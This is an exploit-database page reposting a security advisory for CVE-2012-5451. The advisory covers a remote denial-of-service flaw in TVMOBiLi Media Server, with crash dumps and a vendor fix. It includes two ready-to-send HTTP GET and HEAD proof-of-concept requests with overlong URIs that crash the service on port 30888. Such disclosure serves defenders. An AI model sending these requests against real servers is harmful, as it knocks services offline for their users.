0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TVMOBiLi Media Server 2.1.0.3557 Denial Of Service
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
Product: TVMOBiLi media server Vendor: TVMOBiLi Vulnerable Version(s): 2.1.0.3557 and probably prior version Tested Version: 2.1.0.3557 in Windows XP SP3 32 bits Vendor Notification: October 15, 2012 Vendor Patch: November 21, 2012 Public Disclosure: December 5, 2012 Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130] CVE Reference: CVE-2012-5451 CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P) Solution Status: Fixed by Vendor Risk Level: Medium Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests. 1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451 1.1 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port (default TVMOBiLi's server port) and cause a stack-based buffer overrun that will crash tvMobiliService service. Crash details MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000 CONTEXT DUMP EIP: 78abe2ad mov [edx],al EAX: 00b8fd3e ( 12123454) -> injected stream (stack) EBX: 00000019 ( 25) -> N/A ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack) EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack) ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx' (stack) +00: 78abe2ff (2024530687) -> N/A +04: 00000000 ( 0) -> N/A +08: 0000011f ( 287) -> N/A +0c: 00000002 ( 2) -> N/A +10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A disasm around: 0x78abe28e jnc 0x78abe2f9 0x78abe290 outsb 0x78abe292 and fs:[eax],al 0x78abe296 test byte [ecx+0xc],0x40 Proof of Concept The following HTTP GET request will crash vulnerable tvMobiliService service remotely: GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 HOST: 192.168.10.12:30888 Referer: 192.168.10.12:30888 ACCEPT: */* Accept-Encoding: None User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Connection: Close Accept-Transfer-Encoding: None 1.2 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to 30888/TCP port and cause a stack-based buffer overrun that will crash tvMobiliService service. Crash details MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000 CONTEXT DUMP EIP: 78abe2ad mov [edx],al EAX: 00b8fd3e ( 12123454) -> injected stream (stack) EBX: 00000019 ( 25) -> N/A ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack) EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack) ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx' (stack) +00: 78abe2ff (2024530687) -> N/A +04: 00000000 ( 0) -> N/A +08: 0000011f ( 287) -> N/A +0c: 00000002 ( 2) -> N/A +10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A disasm around: 0x78abe28e jnc 0x78abe2f9 0x78abe290 outsb 0x78abe292 and fs:[eax],al 0x78abe296 test byte [ecx+0xc],0x40 Proof of Concept The following HTTP HEAD request will crash vulnerable tvMobiliService service remotely: HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 HOST: 192.168.10.12:30888 Referer: 192.168.10.12:30888 ACCEPT: */* Accept-Encoding: None User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Connection: Close Accept-Transfer-Encoding: None ----------------------------------------------------------------------------------------------- Solution: Upgrade to TVMOBiLi 2.1.0.3974 More Information: http://forum.tvmobili.com/viewtopic.php?f=7&t=55117 http://dev.tvmobili.com/changelog.php ----------------------------------------------------------------------------------------------- # 0day.today [2024-11-15] #